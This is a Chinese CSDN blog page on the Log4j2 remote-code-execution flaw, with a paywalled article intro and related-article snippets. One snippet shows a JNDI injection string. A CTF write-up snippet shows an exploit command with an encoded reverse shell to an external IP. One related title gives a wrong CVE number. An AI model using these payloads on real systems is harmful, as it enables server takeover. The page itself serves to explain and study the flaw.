深入解析著名的阿里云Log4j 漏洞

最新推荐文章于 2024-07-02 22:53:38 发布
最新推荐文章于 2024-07-02 22:53:38 发布
阅读量3.4k 收藏 9
点赞数 3
分类专栏: 全栈网络安全 渗透测试 代码审计 网络安全工具开发 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35029061/article/details/125960217
版权
本文深入剖析了阿里云发现的Apache Log4j2安全漏洞,该漏洞可能导致远程代码执行,影响广泛,包括苹果、亚马逊、微软等。Log4j2是Java的流行日志框架,漏洞源于lookup功能的设计缺陷。文章详细介绍了漏洞的起因、威胁、复现过程以及修复措施,包括设置JVM参数、升级Log4j2版本等。
摘要由CSDN通过智能技术生成

几乎每个系统都会使用日志框架,用于记录日志信息,这些信息可以提供程序运行的上下文,但是日志过多也会影响系统的性能,所以好的日志框架应该是可靠,快速和可扩展的。

Apache Log4j2 是一个基于 Java 的日志工具,是Log4j的升级版本,引入了很多丰富的特性,包括高性能,低垃圾收集,插件系统等。目前很多互联网公司以及耳熟能详的公司的系统或者开源框架都在使用Log4j2。

一、事件起因

Log4j 漏洞最早由阿里云安全团队报告,其员工 Chen Zhaojun 于 11 月 24 日向 Apache 组织发送了一封邮件,在邮件中他写道,“我想报告一个安全漏洞,这个漏洞将会带来很大的影响”。该邮件详述了黑客可能会如何利用 Log4j 这一广泛使用的软件工具,实现所谓的远程代码控制,这是黑客的梦想,因为他们可以远程接管一台计算机。

Apache平台开始预警与测试修复,于12月初完成修补,随后阿里云在12月9日正式发布网络安全通报,并公布细节。这个漏洞的风险层级达到了CVSS满分10分,可能是近年最严重的安全漏洞之一。

不过工信部12月11号才知道有这事,作为近十年最大的系统漏洞,有报道称在漏洞修复前,国内七成的网站处于裸奔状态,等知道的时候,黄花菜已经凉了...

工信部依据2021年9月1号开始执行的《网络产品

了解本专栏 订阅专栏 解锁全文 超级会员免费看
wespten
关注
专栏目录
订阅专栏
Log4j漏洞调研,源码浅解析
weixin_44029684的博客
12-17 1570
最近log4j安全漏洞突然冒了出来,用了许久slf4j的我吓得赶紧翻遍了依赖,发现自己用的依赖并没有依赖上log4j-core,长吁一口气。吃了个午饭后转念一想我又没工作,也没啥线上项目在跑,何故担心这些问题?wc,那倒腾半天不就白整了,不行,反正这漏洞在java圈也挺大的,不如顺便研究一波,在未来应聘时也有聊的地方。 全文几乎都是站在巨人的肩膀上完成的,新人技术不佳,还望轻喷。
Log4j史诗级漏洞,我们这些小公司能做些什么?
shenliba的博客
04-16 643
分享一些资料给大家,我觉得这些都是很有用的东西,大家也可以跟着来学习,查漏补缺。《Java高级面试》《Java高级架构知识》《算法知识》《互联网大厂面试真题解析、进阶开发核心学习笔记、全套讲解视频、实战项目源码讲义》点击传送门即可获取!《算法知识》[外链图片转存中…(img-q3CazKpR-1713222212930)]《互联网大厂面试真题解析、进阶开发核心学习笔记、全套讲解视频、实战项目源码讲义》点击传送门即可获取!
Log4j漏洞分析
a1290320893的博客
12-13 2622
先看问题: 原本我只是希望logger.info(“hello,{}”,message); 用message来替换{}输出:hello,pxq; 但是假如我的message是${java:os},就是输出设备的具体信息;像这种可能存在隐患; 进一步如果String strings = “${jndi:rmi://127.0.0.1:1899/asd}”; 就会去执行注册中心127.0.0.1:1899中的名为asd的服务,只要用户使用了logger.info()且版本在log4j-api的版本在2.14.0
Log4j日志框架讲解(全面,详细)
最新发布
smilehjl
07-02 2077
Log4j是Apache下的一款开源的日志框架,通过在项目中使用 Log4J,我们可以控制日志信息输出到控制台、文件、甚至是数据库中。我们可以控制每一条日志的输出格式,通过定义日志的输出级别,可以 更灵活的控制日志的输出过程。方便项目的调试。log4j这个日志框架是现在那些流行的日志框架实现的始祖,现在流行的logback,log4j2这些都是基于或者参考log4j这个日志框架实现的,所以学习log4j可以让我们更好的理解和使用现在流行的主流日志框架。
log4j漏洞分析
weixin_47623655的博客
04-11 738
近年来,log4j漏洞成为了备受关注的话题,因为它可能会导致攻击者远程执行代码。在本文中,我们将详细讨论log4j漏洞的背景、原理和应对措施。
Web网络安全-----Log4j高危漏洞原理及修复
qq_51690690的博客
07-27 1万+
Log4j 即 log for java(java的日志) ,是Apache的一个开源项目,通过使用Log4j,我们可以控制日志信息输送的目的地是控制台、文件、GUI组件,甚至是套接口服务器、NT的事件记录器、UNIX Syslog守护进程等;我们也可以控制每一条日志的输出格式;通过定义每一条日志信息的级别,我们能够更加细致地控制日志的生成过程。最令人感兴趣的就是,这些可以通过一个配置文件来灵活地进行配置,而不需要修改应用的代码。提示:以下是本篇文章正文内容,下面案例可供参考。
突发!Log4j 爆“核弹级”漏洞,Flink、Kafka等至少十多个项目受影响
机器学习算法与Python学习
12-10 323
点击 机器学习算法与Python学习 ,选择加星标精彩内容不迷路本文来自InfoQ昨晚,对很多程序员来说可能是一个不眠之夜。12 月 10 日凌晨,Apache 开源项目 Log4j 的远...
全网连夜修复的Log4j漏洞,如何做
2401_84047990的博客
04-19 1011
同时也并不是完全没有缺点,主要的问题就是可能带来一定的性能损耗。还有就是开发难度比较高,需要对 JVM 字节码、ASM 工具、漏洞触发原理以及各类Java 应用容器都有所了解。RASP技术目前已经非常成熟,在PHP、Java、.NET等多种语言中都有实现方案。
Log4J2漏洞(CVE-2024-44228)原理_log4j2漏洞原理,2024年最新快手网络安全面试
2401_83621004的博客
04-15 837
Apache Log4j2是一个基于Java的日志记录工具,当前被广泛应用于业务系统开发,开发 者可以利用该工具将程序的输入输出信息进行日志记录。2021年11月24日,阿里云安全团队向Apache官方报告了Apache Log4j2远程代码执行漏 洞。该漏洞是由于Apache Log4j2某些功能存在递归解析功能,导致攻击者可直接构造恶 意请求,触发远程代码执行漏洞,从而获得目标服务器权限。漏洞适应版本:2.0
Apache Log4j2漏洞复现
MoCoCN的博客
12-22 2933
0x00 前言 慢慢的距离上次写文章已过去了377天,这一年发生了好多好多的事,经历了好多好多的变故,或喜或悲、或分或合、起起落落,整整的一年了得,没怎么好好学习,没怎么认真的钻研技术,对自己表示很抱歉,违背了“白帽守则”,让我们重温一下“白帽守则”: 白帽守则第一页第一条,心中无女人,挖洞自然神。 白帽守则第一页第二条,只有不努力的白帽,没有挖不到的漏洞 对此我深表歉意、望大家以我为戒,踏踏实实的深入贯彻落实“白帽守则”,切实维护祖国网络空间安全。 0x01漏洞描述 Apache Log4j2是一款优秀的
JAVA安全--log4j漏洞研究分析
goddemon
03-12 1万+
log4j漏洞复现 复现 这里以bugku上的靶场为例进行复现 https://ctf.bugku.com/challenges/detail/id/340.html 环境配置 ①ldap服务 服务器起一个ldap服务就好了 直接执行反弹shell 即直接配置bash反弹shell命令 java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC84Mi4xNTYuM
log4j漏洞分析及总结
热门推荐
csd_ct的专栏
02-14 4万+
2021年12月8号爆出的log4j2的远程代码执行漏洞【cve-2021-44228】,堪称史诗级核弹漏洞,虽然过了这么久,大部分现网中的相关漏洞已经修复,但任然可以捡漏…,网上也有不少大佬和研究机构都对该漏洞做了分析和复盘,年前年后比较忙,一直没有好好的分析总结该漏洞,最近学习下刚好补上。 漏洞描述及影响 log4j是Apache的一个开源项目,是一个基于Java的日志记录框架。Log4j2是log4j的后继者,被大量用于业务系统开发,记录日志信息。很多互联网公司以及耳熟能详的公司的系统都在使用该框架。
深入分析Log4j 漏洞
嘉禾笔记
12-16 1万+
几乎每个系统都会使用日志框架,用于记录日志信息,这些信息可以提供程序运行的上下文,但是日志过多也会影响系统的性能,所以好的日志框架应该是可靠,快速和可扩展的。 Apache Log4j2 是一个基于 Java 的日志工具,是Log4j的升级版本,引入了很多丰富的特性,包括高性能,低垃圾收集,插件系统等。目前很多互联网公司以及耳熟能详的公司的系统或者开源框架都在使用Log4j2。 2021.12.7,Log4j首次被发现了一个非常严重的漏洞,在当天Log4j就发布了log4j-2.15.0-rc1,但是12.
Apache Log4j2漏洞 (CVE-2021-44228) 分析与复现
未完成的歌~的博客
03-15 9932
Apache Log4j2 是一个开源的 Java 日志记录工具。Log4j2 是 Log4j 的升级版本,其优异的性能被广泛的应用于各种常见的 Web 服务中。Log4j2 在特定的版本中由于启用了 lookup 功能,导致存在 JNDI 漏洞。lookup 函数是用于在日志消息中替换变量的函数,是通过配置文件中的${}语法调用的,例如:如果在日志消息中使用了,那么 log4j2 将使用 lookup 函数从系统属性中查找名为 “my.property” 的属性值,并将其替换为实际值。
尴尬,刚夸完就被罚,因未及时报告Log4j2安全漏洞阿里云被处罚
终码一生
12-24 3930
点击“终码一生”,关注,置顶公众号 每日技术干货,第一时间送达! 近期,工业和信息化部网络安全管理局通报称,阿里云被暂停工信部网络安全威胁信息共享平台合作单位6个月。 近日,阿里云公司发现阿帕奇(Apache)Log4j2组件严重安全漏洞隐患后,未及时向电信主管部门报告,未有效支撑工信部开展网络安全威胁和漏洞管理。经研究,现暂停阿里云公司作为上述合作单位6个月。暂停期满后,根据阿里云公司整改情况,研究恢复其上述合作单位。 阿帕奇(Apache)Log4j2组件是基于Java语
“核弹级” Log4j 漏洞仍普遍存在,并造成持续影响
码农code之路
07-26 155
出品:OSCHINA,编辑:白开水不加糖来源:https://www.oschina.net/news/203874/log4j-the-pain-just-keeps-going-and-goingLog4j “核弹级” 漏洞 Log4Shell 或许将永远影响世界。美国国土安全部 (DHS) 网络安全审查委员会 (CSRB) 近日发布了针对去年Log4Shell漏洞...
LOG4J 漏洞深度分析与安全自查指南
漏洞复现过程表明,只需在日志消息中插入特定的变量,比如`${...}`,攻击者就能触发Log4j2解析这些变量并尝试从网络资源(如LDAP服务器)中查找数据,从而可能导致远程代码执行。例如,攻击者可能在日志中注入`${...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

wespten

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值